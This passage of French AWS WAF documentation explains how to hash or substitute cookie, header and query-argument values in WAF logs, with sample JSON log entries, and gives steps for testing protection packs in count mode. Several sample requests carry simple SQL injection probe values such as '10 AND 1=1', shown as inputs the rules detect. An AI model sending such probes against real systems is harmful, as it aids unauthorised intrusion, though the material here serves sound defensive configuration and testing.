            "location": "BODY",
            "matchedData": ["REDACTED"]
        }]
    }],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }, {
            "name": "cookie",
            "value": "hoppy=dog;"
        }],
        "uri": "/CanaryTest",
        "args": "baloo=abc&hoppy-query=xyz&x-hoppy-extra=generic-%3Cwords%3E-in-angle-brackets",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

## Protection des données pour `SINGLE_COOKIE`
<a name="single-cookie-data-protection"></a>

Configuration de Webacl

```
 "data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "SINGLE_COOKIE",
                        "field_keys": [
                            "MILO"
                        ]
                    },
                    "action": "HASH",
                    "exclude_rule_match_details": false,
                    "exclude_rate_based_details": false
                }
             ]
           }
```

Exemple DataProtection de `SINGLE_COOKIE` : entrée de journal protégée par le `SINGLE_COOKIE` nom « MILO ».

Le journal complet indique que le cookie nommé MILO est protégé dans `ruleMatchDetails` l'en-tête du cookie. Seules les valeurs des cookies sont protégées et les noms de clés sont exclus.

**Note**  
Tous les champs protégés (en-tête unique, cookie, argument de requête) ne distinguent pas les majuscules et minuscules. Ainsi, dans cet exemple, « MILO » correspond à « milo ».

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [{
        "ruleId": "ProtectedSQLIHeadersVisibleInSTM",
        "action": "COUNT",
        "ruleMatchDetails": [{
            "conditionType": "SQL_INJECTION",
            "sensitivityLevel": "HIGH",
            "location": "COOKIE",
            "matchedData": ["zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE="],
            "matchedFieldName": "milo"
        }]
    }],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }, {
            "name": "cookie",
            "value": "hoppy=dog;milo=zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE=;aws-waf-token=51c71352-41f5-4f6d-b676-c24907bdf819:EQoAZ/J+AAQAAAAA:t9wvxbw042wva7E2Y6lgud/bS6YG0CJKVAJqaRqDZ140ythKW0Zj9wKB2O8lSkYDRqf1yONcVBFo5u0eYi0tvT4rtQCXsu+KanAardW8go4QSLw4yoED59lgV7oAhGyCalAzE7ra29j+RvvZPsQyoQuDCrtoY/TvQyMTXIXzGPDC/rKBbg=="
        }],
        "uri": "/CanaryTest",
        "args": "baloo=abc&hoppy-query=xyz&x-hoppy-extra=generic-%3Cwords%3E-in-angle-brackets",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

## Protection des données pour tous les cookies
<a name="all-cookies-data-protection"></a>

Vous pouvez configurer la protection des données pour les cookies en utilisant`SINGLE_HEADER`. Seules les valeurs des cookies sont protégées et les noms de clés sont exclus.

```
"DataProtectionConfig": {
    "DataProtections": [
        {
            "Field": {
                "FieldType": "SINGLE_HEADER",
                "FieldKeys": ["cookie"]
            },
            "Action": "SUBSTITUTION",
            "ExcludeRuleMatchDetails": false,
            "ExcludeRateBasedDetails": false
        }
    ]
}
```

Exemple DataProtection pour le `header ` « COOKIE » : entrée de journal avec l'en-tête du cookie protégé.

**Note**  
Le nom du cookie `AWS-WAF-TOKEN` n'est pas couvert par la protection des données.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }, {
            "name": "cookie",
            "value": "hoppy=REDACTED;milo=REDACTED;aws-waf-token=51c71352-41f5-4f6d-b676-c24907bdf819:EQoAZ/J+AAQAAAAA:t9wvxbw042wva7E2Y6lgud/bS6YG0CJKVAJqaRqDZ140ythKW0Zj9wKB2O8lSkYDRqf1yONcVBFo5u0eYi0tvT4rtQCXsu+KanAardW8go4QSLw4yoED59lgV7oAhGyCalAzE7ra29j+RvvZPsQyoQuDCrtoY/TvQyMTXIXzGPDC/rKBbg=="
        }],
        "uri": "/CanaryTest",
        "args": "baloo=xyz=&hoppy-query=abc&x-hoppy-extra=abc",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

## Protection des données pour les arguments d'une seule requête
<a name="single-query-argument"></a>

Vous pouvez configurer la protection des données pour une chaîne de requête en utilisant`SINGLE_QUERY_ARGUMENT`. Cela affecte les clés et les valeurs de tous les arguments de requête. Pour les exemples suivants, la chaîne de requête d'origine était`baloo=10 AND 1=1&hoppy=10 AND 1=1&x-hoppy-extra=generic-%3Cwords`.

Configuration de Webacl

```
"DataProtectionConfig": {
   "DataProtections": [
        {
            "Field": {
                "FieldType": "SINGLE_QUERY_ARGUMENT",
                "FieldKeys": ["hoppy"]
            },
            "Action": "SUBSTITUTION",
            "ExcludeRuleMatchDetails": false,
            "ExcludeRateBasedDetails": false
        }
    ]
}
```

Exemple DataProtection de `SINGLE_QUERY_ARGUEMENT` : entrée de journal avec une chaîne de requête « hoppy » protégée par substitution.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionSubstituteQueryString/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [
      {
        "ruleId": "ProtectedHoppyQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": ["REDACTED"],
                "matchedFieldName": "hoppy"
            }]
      },
      {
        "ruleId": "FullQueryStringInspectionWhichDetectsTheFirstFieldWithSQLi_Baloo_IsAlsoMaskedMasked",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "QUERY_ARGS",
                "matchedData": ["REDACTED"],
            }]
      },
      {
        "ruleId": "ProtectedBalooQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": [ "10", "AND", "1" ],
                "matchedFieldName": "baloo"
            }]
      }
    ],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }],
        "uri": "/CanaryTest",
        "args": "baloo=10 AND 1=1&hoppy=REDACTED&x-hoppy-extra=generic-%3Cwords",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

## Protection des données pour les chaînes de requête
<a name="data-protection-query-string"></a>

Vous pouvez configurer la protection des données pour une chaîne de requête en utilisant`QUERY_STRING`. Cela affecte les clés et les valeurs de tous les arguments de requête. Pour les exemples suivants, la chaîne de requête d'origine était`baloo=10 AND 1=1&hoppy-query=10 AND 1=1&x-hoppy-extra=generic-%3Cwords`.

Configuration de Webacl

```
"DataProtectionConfig": {
 "DataProtections": [
 {
 "Field": {
 "FieldType": "QUERY_STRING"
 },
 "Action": "SUBSTITUTION",
 "ExcludeRuleMatchDetails": false,
 "ExcludeRateBasedDetails": false
 }
 ]
}
```

Exemple DataProtection de `QUERY_STRING` : entrée de journal avec une chaîne de requête protégée par substitution.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionSubstituteQueryString/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [
      {
        "ruleId": "ProtectedHoppyQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "QUERY_STRING",
                "matchedData": ["REDACTED"]
            }]
      },
      {
        "ruleId": "ProtectedBalooQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": [ "REDACTED" ],
                "matchedFieldName": "REDACTED"
            }]
      }
    ],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }],
        "uri": "/CanaryTest",
        "args": "REDACTED",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

## Protection des données pour plusieurs arguments de requête
<a name="data-protection-multiple-query-arguments"></a>

Vous pouvez configurer la protection des données pour des arguments de requête individuels en utilisant`SINGLE_QUERY_ARGUMENT`. Lorsque nous communiquons des informations locales, nous utilisons des protections locales. Cependant, les chaînes qui correspondent dans la chaîne de requête et dans l'en-tête du cookie ont de nombreuses configurations de protection qui peuvent s'appliquer. Pour simplifier, la protection la plus stricte `RuleMatchDetails` est appliquée, même si elle ne se chevauche pas avec la plage de données spécifique correspondante.

Pour les exemples suivants, la chaîne de requête d'origine était`baloo=is_a_good_boy&hoppy=likes_to_sleep&x-hoppy-extra=10 AND 1=1`.

```
"DataProtectionConfig": {
    "DataProtections": [
        {
            "Field": {
                "FieldType": "SINGLE_QUERY_ARGUMENT",
                "FieldKeys": ["hoppy"]
            },
            "Action": "SUBSTITUTION",
            "ExcludeRuleMatchDetails": false,
            "ExcludeRateBasedDetails": false
        },
        {
            "Field": {
                "FieldType": "SINGLE_QUERY_ARGUMENT",
                "FieldKeys": ["baloo"]
            },
            "Action": "HASH",
            "ExcludeRuleMatchDetails": false,
            "ExcludeRateBasedDetails": false
        }
    ]
}
```

Exemple DataProtection de plusieurs arguments de requête.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionSubstituteQueryString/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [
      {
        "ruleId": "ProtectedHoppyQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": ["REDACTED"],
                "matchedFieldName": "hoppy"
            }]
      },
      {
        "ruleId": "ProtectedBalooQueryArg",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": ["zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE="],
                "matchedFieldName": "baloo"
            }]
      },
      {
        "ruleId": "FullQueryStringDetects_x-hoppy-extra_IsSubstituted",
        "action": "COUNT",
        "ruleMatchDetails": [
            {
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "QUERY_ARGS",
                "matchedData": ["REDACTED"],  // Harshest of Protection Config
            }]
      }
    ],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "54.239.98.137",
        "country": "US",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "54.239.98.137"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip"
        }, {
            "name": "User-Agent",
            "value": "okhttp/3.12.1"
        }],
        "uri": "/CanaryTest",
        "args": "baloo=zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE=&hoppy=REDACTED&x-hoppy-extra=10 AND 1=1",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "FepO0F8fIAMEqoQ="
    },
    "labels": [{
        "name": "awswaf:forwardedip:geo:country:US"
    }, {
        "name": "awswaf:forwardedip:geo:region:US-VA"
    }]
}
```

**Note**  
Vous ne pouvez pas spécifier à la fois **QueryString le masquage et le masquage** des **arguments à requête unique dans le** même WebACL.

# Configuration de la protection des données pour un pack de protection (ACL Web)
<a name="data-protection-configure"></a>

Cette section fournit des instructions pour configurer la protection des données pour un pack de protection (ACL Web).

**Pour configurer la protection des données pour un pack de protection (ACL Web)**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, choisissez les **packs de protection (Web ACLs)**.

1. Choisissez le nom du pack de protection (ACL Web) pour lequel vous souhaitez activer la protection des données. La console vous amène à la description du pack de protection (ACL Web), où vous pouvez le modifier.

1. Dans l'onglet **Journalisation et mesures**, dans le volet des **paramètres de protection des données**, choisissez **Activer** ou **Modifier**.

1. Choisissez le champ d'application **Global**, puis effectuez vos sélections de protection des données sur le terrain. Pour chaque configuration de protection des données de champ, vous pouvez également spécifier les exceptions à exclure du comportement de protection. 

1. Lorsque vous avez terminé vos sélections, choisissez **Enregistrer**. L'interface revient à l'onglet **Journalisation et statistiques** où vos sélections sont résumées.

# Tester et ajuster vos AWS WAF protections
<a name="web-acl-testing"></a>

Cette section fournit des conseils pour tester et optimiser vos packs de AWS WAF protection (Web ACLs), vos règles, vos groupes de règles, vos ensembles d'adresses IP et vos ensembles de modèles regex.

Nous vous recommandons de tester et de régler les modifications apportées à votre pack de AWS WAF protection (ACL Web) avant de les appliquer au trafic de votre site Web ou de vos applications Web. 

**Risque lié au trafic de production**  
Avant de déployer l'implémentation de votre pack de protection (ACL Web) pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. 

Cette section fournit également des conseils généraux pour tester votre utilisation de groupes de règles gérés par quelqu'un d'autre. Il s'agit notamment des groupes de règles AWS AWS Marketplace gérées, des groupes de règles gérés et des groupes de règles partagés avec vous par un autre compte. Pour ces groupes de règles, suivez également les instructions fournies par le fournisseur de groupes de règles.
+ Pour le groupe de règles AWS gérées par Bot Control, voir également[Tester et déployer AWS WAF Bot Control](waf-bot-control-deploying.md). 
+ Pour le groupe de règles de AWS prévention du piratage de comptes, voir également[Tester et déployer ATP](waf-atp-deploying.md). 
+ Pour le groupe de règles de prévention de la AWS fraude relatif à la création de comptes, voir également[Test et déploiement de l'ACFP](waf-acfp-deploying.md). 

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

# Tester et régler des étapes de haut niveau
<a name="web-acl-testing-high-level"></a>

Cette section fournit une liste des étapes à suivre pour tester les modifications apportées à votre ACL Web, y compris les règles ou les groupes de règles qu'elle utilise. 

**Note**  
Pour suivre les instructions de cette section, vous devez comprendre comment créer et gérer des AWS WAF protections telles que des packs de protection (Web ACLs), des règles et des groupes de règles. Ces informations sont abordées dans les sections précédentes de ce guide.

**Pour tester et ajuster votre pack de protection (ACL Web)**

Effectuez ces étapes d'abord dans un environnement de test, puis en production.

1. 

**Préparez-vous pour les tests**

   Préparez votre environnement de surveillance, passez vos nouvelles AWS WAF protections en mode comptage pour les tests et créez les associations de ressources dont vous avez besoin. 

   Consultez [Préparation à la mise à l'essai de vos AWS WAF protections](web-acl-testing-prep.md). 

1. 

**Surveillez et optimisez les environnements de test et de production**

   Surveillez et ajustez vos AWS WAF protections d'abord dans un environnement de test ou de préparation, puis en production, jusqu'à ce que vous soyez certain qu'elles peuvent gérer le trafic comme vous le souhaitez. 

   Consultez [Surveillance et réglage de vos AWS WAF protections](web-acl-testing-activities.md). 

1. 

**Activez vos protections en production**

   Lorsque vous êtes satisfait de vos protections de test, passez en mode production, nettoyez tous les artefacts de test inutiles et poursuivez la surveillance.

   Consultez [Activer vos protections en production](web-acl-testing-enable-production.md). 

Une fois que vous avez terminé de mettre en œuvre vos modifications, continuez à surveiller votre trafic Web et les protections en production pour vous assurer qu'elles fonctionnent comme vous le souhaitez. Les modèles de trafic Web peuvent changer au fil du temps. Il se peut donc que vous deviez ajuster les protections de temps en temps.

# Préparation à la mise à l'essai de vos AWS WAF protections
<a name="web-acl-testing-prep"></a>

Cette section décrit comment configurer pour tester et ajuster vos AWS WAF protections. 

**Note**  
Pour suivre les instructions de cette section, vous devez comprendre de manière générale comment créer et gérer des AWS WAF protections telles que des packs de protection (Web ACLs), des règles et des groupes de règles. Ces informations sont abordées dans les sections précédentes de ce guide.

**Pour préparer les tests**

1. 

**Activer la journalisation du pack de protection (ACL Web), CloudWatch les métriques Amazon et l'échantillonnage des demandes Web pour le pack de protection (ACL Web)**

   Utilisez la journalisation, les métriques et l'échantillonnage pour surveiller l'interaction des règles du pack de protection (ACL Web) avec votre trafic Web. 
   + **Journalisation** : vous pouvez configurer AWS WAF pour consigner les requêtes Web évaluées par un pack de protection (ACL Web). Vous pouvez envoyer des journaux vers CloudWatch des journaux, un compartiment Amazon S3 ou un flux de diffusion Amazon Data Firehose. Vous pouvez supprimer des champs et appliquer un filtrage. Pour de plus amples informations, veuillez consulter [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
   + **Amazon Security Lake** : vous pouvez configurer Security Lake pour collecter les données du pack de protection (ACL Web). Security Lake collecte les données des journaux et des événements à partir de diverses sources à des fins de normalisation, d'analyse et de gestion. Pour plus d'informations sur cette option, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 
   + **Amazon CloudWatch metrics** — Dans la configuration de votre pack de protection (ACL Web), fournissez des spécifications métriques pour tout ce que vous souhaitez surveiller. Vous pouvez consulter les statistiques via les CloudWatch consoles AWS WAF et. Pour de plus amples informations, veuillez consulter [Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 
   + **Échantillonnage de requêtes Web** : vous pouvez consulter un échantillon de toutes les demandes Web évaluées par votre pack de protection (ACL Web). Pour plus d'informations sur l'échantillonnage des requêtes Web, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

1. 

**Réglez vos protections en Count mode**

   Dans la configuration de votre pack de protection (ACL Web), passez tout ce que vous souhaitez tester en mode comptage. Cela permet aux protections de test d'enregistrer les correspondances par rapport aux requêtes Web sans modifier la façon dont les demandes sont traitées. Vous pourrez voir les correspondances dans vos statistiques, vos journaux et vos exemples de demandes, afin de vérifier les critères de correspondance et de comprendre les effets potentiels sur votre trafic Web. Les règles qui ajoutent des étiquettes aux demandes correspondantes ajouteront des étiquettes quelle que soit l'action de la règle. 
   + **Règle définie dans le pack de protection (ACL Web)** : modifiez les règles du pack de protection (ACL Web) et définissez leurs actions surCount. 
   + **Groupe de règles** : dans la configuration de votre pack de protection (ACL Web), modifiez l'énoncé de règle du groupe de règles et, dans le volet **Règles**, ouvrez le menu **déroulant Annuler toutes les actions des règles** et choisissez. **Count** Si vous gérez le pack de protection (ACL Web) au format JSON, ajoutez les règles aux `RuleActionOverrides` paramètres de la déclaration de référence du groupe de règles, avec `ActionToUse` set toCount. La liste d'exemples suivante montre les remplacements de deux règles du groupe de règles `AWSManagedRulesAnonymousIpList` AWS Managed Rules. 

     ```
       "ManagedRuleGroupStatement": {
         "VendorName": "AWS",
         "Name": "AWSManagedRulesAnonymousIpList",
           "RuleActionOverrides": [
             {
               "ActionToUse": {
                 "Count": {}
               },
               "Name": "AnonymousIPList"
             },
             {
               "ActionToUse": {
                 "Count": {}
               },
               "Name": "HostingProviderIPList"
             }
           ],
           "ExcludedRules": []
         }
       },
     ```

     Pour plus d'informations sur les dérogations aux actions des règles, consultez[Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

     Pour votre propre groupe de règles, ne modifiez pas les actions des règles dans le groupe de règles lui-même. Les règles de groupe de règles avec Count action ne génèrent pas les métriques ou autres artefacts dont vous avez besoin pour vos tests. En outre, la modification d'un groupe de règles affecte tous les packs de protection (Web ACLs) qui l'utilisent, tandis que les modifications apportées à la configuration du pack de protection (ACL Web) n'affectent que le pack de protection unique (ACL Web). 
   + **pack de protection (ACL Web)** : si vous testez un nouveau pack de protection (ACL Web), définissez l'action par défaut du pack de protection (ACL Web) afin d'autoriser les demandes. Cela vous permet d'essayer l'ACL Web sans affecter le trafic de quelque façon que ce soit. 

   En général, le mode comptage génère plus de correspondances que le mode production. En effet, une règle qui compte les demandes n'arrête pas l'évaluation de la demande par le pack de protection (ACL Web), de sorte que les règles exécutées ultérieurement dans le pack de protection (ACL Web) peuvent également correspondre à la demande. Lorsque vous modifiez les actions de vos règles en fonction de leurs paramètres de production, les règles qui autorisent ou bloquent les demandes mettent fin à l'évaluation des demandes auxquelles elles correspondent. Par conséquent, les demandes correspondantes seront généralement inspectées selon un nombre réduit de règles dans le pack de protection (ACL Web). Pour plus d'informations sur les effets des actions liées aux règles sur l'évaluation globale d'une requête Web, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). 

   Avec ces paramètres, vos nouvelles protections ne modifieront pas le trafic Web, mais généreront des informations de correspondance dans les métriques, les journaux du pack de protection (ACL Web) et les exemples de demandes. 

1. 

**Associer le pack de protection (ACL Web) à une ressource**

   Si le pack de protection (ACL Web) n'est pas déjà associé à la ressource, associez-le. 

   Consultez [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

Vous êtes maintenant prêt à surveiller et à régler votre pack de protection (ACL Web). 

# Surveillance et réglage de vos AWS WAF protections
<a name="web-acl-testing-activities"></a>

Surveillez et ajustez vos AWS WAF protections.

**Note**  
Pour suivre les instructions de cette section, vous devez comprendre de manière générale comment créer et gérer des AWS WAF protections telles que des packs de protection (Web ACLs), des règles et des groupes de règles. Ces informations sont abordées dans les sections précédentes de ce guide.

Surveillez le trafic Web et les correspondances de règles pour vérifier le comportement du pack de protection (ACL Web). Si vous rencontrez des problèmes, ajustez vos règles pour les corriger, puis surveillez pour vérifier les ajustements. 

Répétez la procédure suivante jusqu'à ce que le pack de protection (ACL Web) gère votre trafic Web comme vous en avez besoin. 

**Pour surveiller et régler**

1. 

**Surveillez le trafic et respectez les règles**

   Assurez-vous que le trafic circule et que vos règles de test trouvent les demandes correspondantes. 

   Consultez les informations suivantes concernant les protections que vous testez : 
   + **Journaux** : accédez aux informations relatives aux règles qui correspondent à une requête Web : 
     + **Vos règles** : les règles du pack de protection (ACL Web) comportant une Count action sont répertoriées ci-dessous`nonTerminatingMatchingRules`. Les règles avec Allow ou Block sont répertoriées sous la forme`terminatingRule`. Les règles avec CAPTCHA ou Challenge peuvent être résilientes ou non, et sont donc répertoriées dans l'une des deux catégories, en fonction du résultat de la correspondance des règles.
     + **Groupes de règles** : les groupes de règles sont identifiés `ruleGroupId` sur le terrain et leurs correspondances sont classées de la même manière que pour les règles autonomes. 
     + **Étiquettes** : les étiquettes que les règles ont appliquées à la demande sont répertoriées dans le `Labels` champ.

